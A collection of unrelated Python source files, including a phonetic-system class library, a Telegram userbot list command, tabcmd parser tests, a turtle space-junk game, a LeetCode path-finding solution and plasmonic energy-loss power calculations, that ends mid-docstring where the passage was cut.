    update per frame, returning the final hidden state.
    """

    def __init__(self, *args, sequence_len=2, sequence_norm=True, **kwargs):
        super().__init__(*args, **kwargs)
        if sequence_norm:
            # BatchNorm3d over the sequence axis; assumes input shaped
            # (batch, sequence_len, channels, H, W) -- TODO confirm.
            self.sequence_norm = nn.BatchNorm3d(sequence_len)
            # self.sequence_len = sequence_len
        else:
            # Identity fall-through when normalisation is disabled.
            self.sequence_norm = lambda x : x
            # self.sequence_len = None

    def forward(self, x):
        x = self.sequence_norm(x)
        # get the current cell memory and hidden state
        # (the first frame seeds both the hidden and the cell state)
        h_curr, c_curr = x[:,0], x[:,0]
        for i in range(x.shape[1]):  # for i in range(self.sequence_len):
            # the attentive model: attention map from hidden state + frame i
            my_Z = self.V_a(self.tanh(self.W_a(h_curr) + self.U_a(x[:,i])))
            my_A = self.softmax(my_Z)
            AM_cL = my_A * x[:,i]  # attention-weighted frame
            # the convLSTM model: gate update driven by the current frame
            my_I = self.sigmoid(self.W_i(AM_cL) + self.U_i(h_curr))
            my_F = self.sigmoid(self.W_f(AM_cL) + self.U_f(h_curr))
            my_O = self.sigmoid(self.W_o(AM_cL) + self.U_o(h_curr))
            my_G = self.tanh(self.W_c(AM_cL) + self.U_c(h_curr))
            c_next = my_G * my_I + my_F * c_curr
            h_next = self.tanh(c_next) * my_O
            c_curr = c_next
            h_curr = h_next
        return h_curr
| StarcoderdataPython |
9684986 | <gh_stars>0
#!/usr/bin/python
# module abstractphonetics
# This module contains a
#
# Copyright (c) 2020 Universidad de Costa Rica.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the <organization> nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <NAME> BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Researchers:
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# This module contains the methods, classes and variables necessary for the
# implementation of a phonetic system necessary for a research project.
#################
#################
#################
### ###
### NOTES ###
### ###
#################
#################
#################
################################
################################
## ##
## IMPLEMENTATION DECISIONS ##
## ##
################################
################################
###################
###################
## ##
## LIMITATIONS ##
## ##
###################
###################
###########
# IMPORTS #
###########
####################
# GLOBAL VARIABLES #
####################
################################
################################
################################
### ###
### METHODS AND FUNCTIONS ###
### ###
################################
################################
################################
#################
#################
## ##
## FUNCTIONS ##
## ##
#################
#################
###############
###############
## ##
## METHODS ##
## ##
###############
###############
###################
###################
###################
### ###
### CLASSES ###
### ###
###################
###################
###################
##########################
##########################
## ##
## CLASS ABSTRACTPHONE ##
## ##
##########################
##########################
class AbstractPhone:
    """Abstract representation of a phone (speech sound or sign).

    Attributes:
        _features: dict mapping a feature name to True/False/None, where
            None means the feature is not specified yet.
        _name: dict mapping a naming category (e.g. manner, phonation)
            to its value (e.g. plossive, voiced).
        _symbol: string (often a single character, e.g. IPA or X-SAMPA)
            uniquely identifying the phone; "" denotes an empty phone.
    """

    ############
    # CREATORS #
    ############
    def __init__(self, theFeatures, theName, theSymbol):
        """Create a phone from a feature dict, a naming dict and a symbol.

        Bug fixes vs. the previous version:
        - ``__init__`` no longer returns a value (returning True/False
          raised ``TypeError: __init__() should return None`` on every
          single instantiation).
        - The dictionaries are now per-instance copies instead of mutable
          class attributes silently shared by all phones.
        - An empty ``theSymbol`` now yields a valid *empty* phone, which
          ``AbstractPhoneticSystem.findPhoneBySymbol`` relies on.
        """
        self._symbol = theSymbol
        self._name = dict(theName)
        self._features = dict(theFeatures)

    ###########
    # GETTERS #
    ###########
    def getSymbol(self):
        """Return the identifying symbol string."""
        return self._symbol

    def getName(self):
        """Return the naming dictionary (was an unimplemented stub)."""
        return self._name

    def getFeatures(self):
        """Return the feature dictionary (was an unimplemented stub)."""
        return self._features

    def getNameValue(self, cathegory):
        """Return the name stored under the naming category *cathegory*."""
        return self._name[cathegory]

    def getFeatureValue(self, feature):
        """Return True/False/None for the feature called *feature*."""
        return self._features[feature]

    ###########
    # SETTERS #
    ###########
    def setSymbol(self, symbol):
        self._symbol = symbol

    def setName(self, name):
        """Merge the entries of *name* into the naming dictionary."""
        self._name.update(name)

    def setFeatures(self, features):
        """Merge the entries of *features* into the feature dictionary."""
        self._features.update(features)

    def setNameValue(self, key, value):
        self._name[key] = value

    def setFeatureValue(self, key, value):
        self._features[key] = value

    ###########
    # METHODS #
    ###########
    def isEmpty(self):
        """Return True when the phone carries no information.

        A phone is empty when its symbol is "" or when every feature and
        naming value is None. (Bug fix: the previous version read the
        nonexistent attribute ``self._names`` and always raised
        AttributeError.)
        """
        if len(self._symbol) == 0:
            return True
        specified = sum(1 for v in self._features.values() if v is not None)
        specified += sum(1 for v in self._name.values() if v is not None)
        return specified == 0
##############################
##############################
## ##
## CLASS ABSTRACTPHONETICS ##
## ##
##############################
##############################
class AbstractPhoneticSystem:
    """Abstract phonetic system: a phone inventory plus feature rules.

    Attributes:
        _inventory: list of AbstractPhone objects.
        _rules: list of FeatureRule objects.
        _features: list of all phonetic feature names (fixed at creation).
        _names: list of all naming category names (fixed at creation).
    """

    ############
    # CREATORS #
    ############
    def __init__(self, featureArray, namingArray):
        # Bug fix: the previous version assigned ``self.features`` /
        # ``self.names`` (wrong attribute names, so getFeatureList and
        # getMatches always saw empty lists) and shared mutable class-level
        # lists between every instance.
        self._features = list(featureArray)
        self._names = list(namingArray)
        self._inventory = []
        self._rules = []

    ###########
    # GETTERS #
    ###########
    def getInventory(self):
        return self._inventory

    def getRules(self):
        return self._rules

    def getFeatureList(self):
        return self._features

    def getNamingList(self):
        return self._names

    ###########
    # METHODS #
    ###########
    def addPhone(self, phone):
        """Add *phone* to the inventory if it is consistent with every rule.

        Returns True when the phone was appended, False when at least one
        rule in the rule book rejected it.
        """
        if all(rule.isConsistent(phone) for rule in self._rules):
            self._inventory.append(phone)
            return True
        return False

    def addRule(self, rule):
        """Add *rule* to the rule book.

        NOTE(review): still unimplemented -- the new rule must be checked
        not to make the rule system inconsistent before being stored.
        """
        pass

    def getMatches(self, conditions):
        """Return every inventory phone satisfying all *conditions*.

        *conditions* is a list of [key, value] pairs where key is either a
        feature name or a naming category, e.g.
        ``[["SYLLABIC", False], ["PHONATION", "UNVOICED"]]``. An empty
        list matches the whole inventory (vacuous truth). An unspecified
        feature (value None) is not treated as a mismatch; an unknown key
        disqualifies the phone.
        """
        matches = []
        for phone in self._inventory:
            satisfied = True
            for condition in conditions:
                key = condition[0]
                if key in self._features:
                    value = phone.getFeatureValue(key)
                    # None means "not specified yet" -> never a mismatch.
                    if value is not None and value != condition[1]:
                        satisfied = False
                elif key in self._names:
                    if phone.getNameValue(key) != condition[1]:
                        satisfied = False
                else:
                    # Unknown key: the phone cannot satisfy the condition.
                    satisfied = False
            if satisfied:
                matches.append(phone)
        return matches

    def findPhoneBySymbol(self, symbol):
        """Return the first inventory phone carrying *symbol*.

        When no such phone exists an empty AbstractPhone is returned.
        """
        for phone in self._inventory:
            if phone.getSymbol() == symbol:
                return phone
        return AbstractPhone({}, {}, "")
######################
######################
## ##
## CLASS SOMECLASS ##
## ##
######################
######################
class FeatureRule:
    """Implication rule over phone features: when every antecedent
    condition holds for a phone, every consequent condition must hold too.

    NOTE(review): this class is still a skeleton. ``isConsistent`` is an
    unimplemented stub whose ``pass`` returns None (falsy), so
    ``AbstractPhoneticSystem.addPhone`` currently rejects every phone as
    soon as any rule is present -- confirm intended semantics before
    relying on it.
    """
    ##############
    # ATTRIBUTES #
    ##############
    # Placeholder condition lists; their element format is not fixed yet.
    _antecedents = []
    _consequents = []
    ############
    # CREATORS #
    ############
    ###########
    # GETTERS #
    ###########
    ###########
    # SETTERS #
    ###########
    ###########
    # METHODS #
    ###########
    def isConsistent(self,phone):
        # This method takes an object of the class AbstractPhone, and checks if
        # the phone is consistent with the current rule. This is, either not all
        # the anticedents are satisfied, this is, the rule does not apply, or if
        # all the antecedents are satisfied and all the consecuents are
        # satisfied, this is, the rule is fulfilled, then, it returns True. If
        # all the antecedents are satisfied, but not all the consequents are,
        # then the rule is violated, and this method returns False.
        # NOTE(review): unimplemented -- currently returns None.
        pass
###############
# END OF FILE #
###############
| StarcoderdataPython |
3561334 | <gh_stars>0
from userbot import is_mongo_alive, is_redis_alive, BOTLOG, BOTLOG_CHATID
from userbot.events import register
from userbot.modules.dbhelper import add_list
from . import DB_FAILED
@register(outgoing=True, pattern=r"^\.add(g)?list (\w*)")
async def addlist(event):
""" For .add(g)list command, saves lists in a chat. """
if not is_mongo_alive() or not is_redis_alive():
await event.edit(DB_FAILED)
return
is_global = event.pattern_match.group(1) == "g"
listname = event.pattern_match.group(2)
content = event.text.partition(f"{listname} ")[2].splitlines()
msg = "`List {} successfully. Use` ${} `to get it.`"
chatid = 0 if is_global else event.chat_id
if await add_list(chatid, listname, content) is False:
await event.edit(msg.format('updated', listname))
else:
await event.edit(msg.format('created', listname))
if BOTLOG:
listat = "global storage" if is_global else str(event.chat_id)
await event.client.send_message(
BOTLOG_CHATID, f"Created list {listname} in {listat}")
| StarcoderdataPython |
6614696 | <gh_stars>1-10
import unittest
from tabcmd.commands.project.create_project_command import CreateProjectCommand
from .common_setup import *
commandname = "createproject"
class CreateProjectParserTest(unittest.TestCase):
    """Argument-parser tests for the tabcmd "createproject" command."""

    @classmethod
    def setUpClass(cls):
        # Build the parser once for the whole test class.
        cls.parser_under_test = initialize_test_pieces(commandname, CreateProjectCommand)

    def test_create_project_parser_optional_arguments(self):
        """Long-form flags (--name, --parent-project-path) parse correctly."""
        mock_args = [
            commandname,
            "--name",
            "testproject",
            "--parent-project-path",
            "abcdef",
            "--description",
            "desc",
        ]
        args = self.parser_under_test.parse_args(mock_args)
        assert args.project_name == "testproject"
        assert args.parent_project_path == "abcdef"

    def test_create_project_parser_required_arguments_name(self):
        """The short -n alias populates project_name like --name."""
        mock_args = [
            commandname,
            "-n",
            "project-name",
            "--parent-project-path",
            "abcdef",
            "--description",
            "desc",
        ]
        args = self.parser_under_test.parse_args(mock_args)
        assert args.project_name == "project-name"
        assert args.parent_project_path == "abcdef"

    def test_create_project_parser_required_arguments_missing_name(self):
        """Omitting the required name makes argparse exit (SystemExit)."""
        mock_args = [
            commandname,
            "--parent-project-path",
            "abcdef",
            "--description",
            "desc",
        ]
        with self.assertRaises(SystemExit):
            self.parser_under_test.parse_args(mock_args)

    def test_create_project_parser_optional_arguments_missing_project_path(self):
        """--parent-project-path without a value makes argparse exit."""
        mock_args = [
            commandname,
            "-n",
            "project-name",
            "--parent-project-path",
            "--description",
            "desc",
        ]
        with self.assertRaises(SystemExit):
            args = self.parser_under_test.parse_args(mock_args)
| StarcoderdataPython |
683 |
class Node(object):
    """Graph node holding a name, the list of nodes it follows, a driving
    intention and a lane assignment."""

    def __init__(self, name, follow_list, intention, lane):
        self.name = name
        self.follow_list = follow_list
        self.intention = intention
        self.lane = lane

    def __eq__(self, other):
        """Two nodes are equal when all four attributes match; any
        non-Node operand compares unequal."""
        if not isinstance(other, Node):
            return False
        return (self.name == other.get_name()
                and self.follow_list == other.get_follow_list()
                and self.intention == other.get_intention()
                and self.lane == other.get_lane())

    def get_name(self):
        return self.name

    def set_name(self, name):
        self.name = name

    def get_follow_list(self):
        return self.follow_list

    def set_follow_list(self, follow_list):
        self.follow_list = follow_list

    def get_intention(self):
        return self.intention

    def set_intention(self, intention):
        self.intention = intention

    def get_lane(self):
        return self.lane

    def set_lane(self, lane):
        self.lane = lane
| StarcoderdataPython |
3433998 | <filename>src/app.py
import threading
from random import randint, uniform
from playsound import playsound
from turtle import Screen, Turtle, screensize
from utils.alerts import show_alert
from utils.score import update_scoreboard
from intro import start_intro
screen = Screen()
screen.bgcolor('#000000')
screen.bgpic('./assets/background.gif')
screen.title('Space Junk Collector')
screen.delay(0)  # disable turtle's animation delay; the game loop drives updates
# images
screen.addshape('./assets/collector.gif')
screen.addshape('./assets/satellite-1.gif')
# game state
development = False  # True skips the intro and reveals the player at once
ready = False        # input handlers are no-ops until the intro finishes
level = 0
score = 0
junk_list = []       # all live junk turtles currently on screen
junk_speed = 0.1     # grows each level; used to normalise junk velocity
# NOTE(review): imported after the screen/shape setup above -- collector.py
# presumably needs the registered shapes; confirm before moving it up.
from collector import Collector, Bullet
player = Collector()
bullet = Bullet()
def create_junk(num_of_junk):
    """Spawn *num_of_junk* satellite sprites at random on-screen positions
    and register them in the global junk_list."""
    screen_w, screen_h = screensize()
    for _ in range(num_of_junk):
        pos_x = randint(-screen_w, screen_w)
        pos_y = randint(-7, screen_h)
        width = uniform(0.5, 1.5)
        height = uniform(0.5, 1.5)
        piece = Turtle()
        piece.speed(0)
        piece.hideturtle()
        piece.shape('./assets/satellite-1.gif')
        piece.penup()
        piece.shapesize(width, height)
        piece.goto(pos_x, pos_y)
        piece.showturtle()
        junk_list.append(piece)
def level_up():
    """Advance to the next level: mark the game ready, reveal the player on
    level 1, refresh the scoreboard, spawn 3*level junk and speed it up."""
    global level, ready, junk_speed
    ready = True
    level += 1
    # The collector is revealed once on the first level (always in dev mode).
    if level == 1 or development: player.show()
    update_scoreboard(score, level)
    create_junk(3 * level)
    junk_speed += level
# Skip the intro sequence while developing; otherwise the intro calls
# level_up when it finishes.
if not development: start_intro(level_up)
else: level_up()
# keys
# Both WASD and arrow keys (plus space to shoot) are bound; every handler
# is a no-op until the intro has finished (`ready` flag).
screen.onkeypress(lambda: player.left() if ready else None, 'a')
screen.onkeypress(lambda: player.left() if ready else None, 'Left')
screen.onkeypress(lambda: player.right() if ready else None, 'd')
screen.onkeypress(lambda: player.right() if ready else None, 'Right')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'w')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'Up')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'space')
screen.listen()
# game loop / object collision detection
def game():
    """One frame of the game loop: bullet collisions, junk movement and
    bouncing; reschedules itself via screen.ontimer."""
    global score, level
    # NOTE(review): player_x/player_y are currently unused.
    (player_x, player_y) = player.position()
    if bullet.isvisible():
        bullet.move()
        # Iterate over a copy so junk can be removed while looping.
        for index, junk in list(enumerate(junk_list)):
            if bullet.collided_with(junk):
                junk.clear()
                junk.hideturtle()
                junk_list.remove(junk)
                score += 1
                update_scoreboard(score, level)
                # play sound
                # Played on a background thread so audio never blocks a frame.
                def play_collect_sound():
                    thread = threading.Thread(
                        target = lambda: playsound('./assets/audio/collect_sound_effect.mp3', block=False),
                        name = 'soundThread'
                    )
                    thread.start()
                play_collect_sound()
                if len(junk_list) == 0:
                    # no more junk, level up!
                    bullet.destroy()
                    level_up()
    for junk in junk_list:
        (screen_x, screen_y) = screensize()
        (x, y) = junk.position()
        # Bounce off the screen edges.
        # NOTE(review): the second condition is true for almost every x, so
        # the heading is mirrored nearly every frame -- verify against the
        # original file (indentation was lost in this excerpt).
        if (abs(x + 10) >= screen_x):
            heading = junk.heading()
            junk.setheading(180 - heading)
        if (abs(x - 10) <= screen_x):
            heading = junk.heading()
            junk.setheading(-heading)
        # consistent speed
        mod = ((junk_speed * len(junk_list)) / (junk_speed * 3)) / 10
        junk.forward(mod)
    screen.ontimer(game, 1)
game()
update_scoreboard(score, level)
screen.update()
screen.mainloop()
| StarcoderdataPython |
1855641 | """ Leetcode 797 - All Paths From Source To Target
https://leetcode.com/problems/all-paths-from-source-to-target/
1. MINE DFS: Time: O(2^(N-2)) Space: O((N+2)*2^(N-3))
"""
from typing import List
class Solution1:
    """ 1. MINE DFS """

    def all_paths_source_target(self, graph: List[List[int]]) -> List[List[int]]:
        """Return every path from node 0 to node len(graph)-1 in the DAG
        *graph*, where graph[i] lists the nodes reachable from i."""
        if not graph:
            return []
        collected = []
        self.dfs(graph, 0, len(graph) - 1, [], collected)
        return collected

    def dfs(self, graph, idx, target_idx, path, all_paths):
        """Depth-first walk from *idx*, extending *path* and recording every
        completed path into *all_paths*."""
        if idx == target_idx:
            all_paths.append(path + [idx])
            return
        # A dead-end node simply yields no successors to recurse into.
        for nxt in graph[idx]:
            self.dfs(graph, nxt, target_idx, path + [idx], all_paths)
if __name__ == '__main__':
    # Manual smoke test: DAG with the two paths 0->1->3 and 0->2->3.
    graph = [[1, 2], [3], [3], []]
    res = Solution1().all_paths_source_target(graph)
    print(res)
| StarcoderdataPython |
11289308 | from .msg import MsgEnum
from .code import CodeEnum
from .modbus import ModbusCodeEnum
| StarcoderdataPython |
4833265 | <reponame>mkraft89/To_eels_app<filename>Calc_power_cresc.py
import numpy as np
from math import factorial
gamma = 0.032  # damping rate used in the Drude permittivity epM below (eV)
n = np.arange(0,30,1)  # multipole orders kept in the truncated expansions
ep0 = 8.85e-12  # vacuum permittivity (F/m)
epD = 1.0  # relative permittivity of the dielectric (vacuum) region
c = 3e8  # speed of light (m/s)
Conv = 1.602e-19/6.626e-34*2*np.pi #Conversion from eV to SI-units
def Pow_abs(x0, x_e, c_e, g, R0, R1, omega):
    """Power absorbed in an annulus excited by a 'circling' electron inside.

    The electron trajectory is the conformal image of a straight trajectory
    in the non-concentric annulus frame (see ELS_slab_crescent.pdf).

    Parameters: x0 inversion point of the conformal map; x_e electron
    coordinate; c_e electron speed; g geometry factor of the map;
    R0/R1 radii of the concentric annulus; omega photon energy in eV.

    Returns the resistive (Ohmic) loss at the given omega.

    Cleanup vs. the previous version: the unused locals ``k_s`` and
    ``sum_k_in``, the dead ``b_n``/dipole computation and the commented-out
    alternative returns were removed. Numerics are unchanged.
    """
    # Drude permittivity of the metal; 64 eV^2 acts as the squared plasma
    # frequency, `gamma` (module level) as the damping.
    epM = 1-64/(omega*(omega+1j*gamma))
    omega = omega*Conv  # convert from eV to SI angular frequency
    R0_x0 = R0/x0
    R1_x0 = R1/x0
    a_n_s = np.zeros(np.size(n), dtype='complex128')
    ###Lambda = 4*pi*eps0 in expression for source coefficients
    ###Calculate lambda according to formula in ELS_slab_crescent.pdf
    a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
    for k_n in range(1,np.size(n)):
        sum_k = 0
        # range(1, k_n+1) iterates exactly the orders the old n[1:k_n+1]
        # slice produced.
        for m in range(1, k_n+1):
            sum_k += factorial(k_n-1) * (-omega*g/c_e/x0)**m\
                / (factorial(m) * factorial(m-1) * \
                factorial(k_n - m))
        a_n_s[k_n] = np.exp(+omega/c_e*x_e) / omega * sum_k
    #Calculate expansion coefficients as in ELS_slab_crescent.pdf
    c_n = a_n_s/\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (-2.) * epD * (epD+epM) * R1_x0**(2*n)
    d_n = a_n_s/\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * 2. * epD * (epD-epM)
    # Ohmic dissipation integrated over the metal shell, split into the
    # two radial solution branches.
    Term1 = sum(n * pow(abs(c_n),2) * x0**(2*n) * (R0**(-2*n)-R1**(-2*n)))
    Term2 = sum(n * pow(abs(d_n),2) * x0**(-2*n) * (R1**(2*n)-R0**(2*n)))
    return np.pi * ep0 * omega * np.imag(epM) * (Term1+Term2)
def Pow_abs_rad_r(x0, x_e, c_e, g2, R0, R1, omega):
    """Power absorbed in the annulus with radiative-reaction correction,
    for an electron passing on the *right* of the annulus.

    Same geometry as :func:`Pow_abs`, but the scattering coefficients are
    corrected by the radiative-reaction term a_n_r
    (see ELS_slab_radiative_reac). Returns the resistive loss at the given
    omega (omega in eV).

    Cleanup vs. the previous version: unused locals ``k_s``/``sum_k_in``
    and a leftover debug comment were removed; numerics are unchanged.
    """
    epM = 1-64/(omega*(omega+1j*gamma))
    omega = omega*Conv  # eV -> SI angular frequency
    k0 = omega/c        # free-space wavenumber
    R0_x0 = R0/x0
    R1_x0 = R1/x0
    a_n_s = np.zeros(np.size(n), dtype='complex128')
    ###Lambda = 4*pi*eps0 in expression for source coefficients
    ###Calculate lambda according to formula in ELS_slab_crescent.pdf
    # NOTE(review): a_n_s[0] carries exp(+omega/c_e*x_e) while the higher
    # orders carry exp(-omega/c_e*x_e) -- verify the sign consistency.
    a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
    for k_n in range(1,np.size(n)):
        sum_k = 0
        for m in range(1, k_n+1):
            sum_k += factorial(k_n-1) * (omega*g2/c_e/x0)**m\
                / (factorial(m) * factorial(m-1) * \
                factorial(k_n - m))
        a_n_s[k_n] = np.exp(-omega/c_e*x_e) / omega * sum_k
    #Calculate scattering coefficients as in ELS_slab_crescent.pdf
    b_n_2 = 1./\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
    #Calculate the radiative reaction term as in ELS_slab_radiative_reac
    a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
        / (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
        * np.ones(np.size(n))
    #Calculate expansion coefficients of induced field in metal
    c_n = (a_n_s + a_n_r)/\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (-2.) * epD * (epD+epM) * R1_x0**(2*n)
    d_n = (a_n_s + a_n_r)/\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * 2. * epD * (epD-epM)
    Term1 = sum(n * pow(abs(c_n),2) * x0**(2*n) * (R0**(-2*n)-R1**(-2*n)))
    Term2 = sum(n * pow(abs(d_n),2) * x0**(-2*n) * (R1**(2*n)-R0**(2*n)))
    return np.pi * ep0 * omega * np.imag(epM) * (Term1+Term2)
def Pow_abs_rad(x0, x_e, c_e, g2, R0, R1, omega):
    """Power absorbed in the annulus with radiative-reaction correction.

    Same source coefficients as :func:`Pow_abs`, with the scattering
    coefficients corrected by the radiative-reaction term a_n_r
    (see ELS_slab_radiative_reac). Returns the resistive loss at the given
    omega (omega in eV).

    Cleanup vs. the previous version: unused locals ``k_s``/``sum_k_in``
    and a leftover debug comment were removed; numerics are unchanged.
    """
    epM = 1-64/(omega*(omega+1j*gamma))
    omega = omega*Conv  # eV -> SI angular frequency
    k0 = omega/c        # free-space wavenumber
    R0_x0 = R0/x0
    R1_x0 = R1/x0
    a_n_s = np.zeros(np.size(n), dtype='complex128')
    ###Lambda = 4*pi*eps0 in expression for source coefficients
    ###Calculate lambda according to formula in ELS_slab_crescent.pdf
    a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
    for k_n in range(1,np.size(n)):
        sum_k = 0
        for m in range(1, k_n+1):
            sum_k += factorial(k_n-1) * (-omega*g2/c_e/x0)**m\
                / (factorial(m) * factorial(m-1) * \
                factorial(k_n - m))
        a_n_s[k_n] = np.exp(+omega/c_e*x_e) / omega * sum_k
    #Calculate scattering coefficients as in ELS_slab_crescent.pdf
    b_n_2 = 1./\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
    #Calculate the radiative reaction term as in ELS_slab_radiative_reac
    a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
        / (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
        * np.ones(np.size(n))
    #Calculate expansion coefficients of induced field in metal
    c_n = (a_n_s + a_n_r)/\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (-2.) * epD * (epD+epM) * R1_x0**(2*n)
    d_n = (a_n_s + a_n_r)/\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * 2. * epD * (epD-epM)
    Term1 = sum(n * pow(abs(c_n),2) * x0**(2*n) * (R0**(-2*n)-R1**(-2*n)))
    Term2 = sum(n * pow(abs(d_n),2) * x0**(-2*n) * (R1**(2*n)-R0**(2*n)))
    return np.pi * ep0 * omega * np.imag(epM) * (Term1+Term2)
def Pow_sca_rad(x0, x_e, c_e, g2, R0, R1, omega):
    """Power scattered by the non-concentric annulus (radiation-corrected).

    Equivalent to the power absorbed by a fictive absorber in the
    concentric-annulus frame; the scattering coefficients b_n include the
    radiative-reaction term a_n_r. Returns the scattered power at the
    given omega (omega in eV).

    Cleanup vs. the previous version: unused locals ``k_s``/``sum_k_in``
    were removed; numerics are unchanged.
    """
    epM = 1-64/(omega*(omega+1j*gamma))
    omega = omega*Conv  # eV -> SI angular frequency
    k0 = omega/c        # free-space wavenumber
    R0_x0 = R0/x0
    R1_x0 = R1/x0
    a_n_s = np.zeros(np.size(n), dtype='complex128')
    ###Lambda = 4*pi*eps0 in expression for source coefficients
    ###Calculate lambda according to formula in ELS_slab_crescent.pdf
    a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
    for k_n in range(1,np.size(n)):
        sum_k = 0
        for m in range(1, k_n+1):
            sum_k += factorial(k_n-1) * (-omega*g2/c_e/x0)**m\
                / (factorial(m) * factorial(m-1) * \
                factorial(k_n - m))
        a_n_s[k_n] = np.exp(+omega/c_e*x_e) / omega * sum_k
    #Calculate scattering coefficients as in ELS_slab_crescent.pdf
    b_n_2 = 1./\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
    #Calculate the radiative reaction term as in ELS_slab_radiative_reac
    a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
        / (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
        * np.ones(np.size(n))
    #Calculate scattering coefficient including radiative losses
    b_n = b_n_2 * (a_n_r + a_n_s)
    E_sca_squ = 2. / x0**2 * abs(np.sum(b_n*n))**2
    return (np.pi*k0*g2)**2 * omega/4 * ep0 * E_sca_squ
def Pow_abs_rad_hori(x0, x_e, c_e, g2, R0, R1, omega):
    """Power absorbed in the annulus with radiative-reaction correction,
    for a *horizontal* electron trajectory (imaginary expansion factor).

    Returns the resistive loss at the given omega (omega in eV).

    Cleanup vs. the previous version: unused locals ``k_s``/``sum_k_in``
    and a leftover debug comment were removed; numerics are unchanged.
    """
    epM = 1-64/(omega*(omega+1j*gamma))
    omega = omega*Conv  # eV -> SI angular frequency
    k0 = omega/c        # free-space wavenumber
    R0_x0 = R0/x0
    R1_x0 = R1/x0
    a_n_s = np.zeros(np.size(n), dtype='complex128')
    ###Lambda = 4*pi*eps0 in expression for source coefficients
    ###Calculate lambda according to formula in ELS_slab_crescent.pdf
    # NOTE(review): a_n_s[0] carries exp(+omega/c_e*x_e) while the higher
    # orders carry exp(-omega/c_e*x_e) -- verify the sign consistency.
    a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
    for k_n in range(1,np.size(n)):
        sum_k = 0
        for m in range(1, k_n+1):
            sum_k += factorial(k_n-1) * (1j*omega*g2/c_e/x0)**m\
                / (factorial(m) * factorial(m-1) * \
                factorial(k_n - m))
        a_n_s[k_n] = np.exp(-omega/c_e*x_e) / omega * sum_k
    #Calculate scattering coefficients as in ELS_slab_crescent.pdf
    b_n_2 = 1./\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
    #Calculate the radiative reaction term as in ELS_slab_radiative_reac
    a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
        / (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
        * np.ones(np.size(n))
    #Calculate expansion coefficients of induced field in metal
    c_n = (a_n_s + a_n_r)/\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * (-2.) * epD * (epD+epM) * R1_x0**(2*n)
    d_n = (a_n_s + a_n_r)/\
        ((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
        * 2. * epD * (epD-epM)
    Term1 = sum(n * pow(abs(c_n),2) * x0**(2*n) * (R0**(-2*n)-R1**(-2*n)))
    Term2 = sum(n * pow(abs(d_n),2) * x0**(-2*n) * (R1**(2*n)-R0**(2*n)))
    return np.pi * ep0 * omega * np.imag(epM) * (Term1+Term2)
def Pow_sca_hori(x0, x_e, c_e, g2, R0, R1, omega):
    """Calculate the power scattered by the non-concentric
    annulus. This is equivalent to the power absorbed by a
    fictive absorver in the concentric annulus frame.
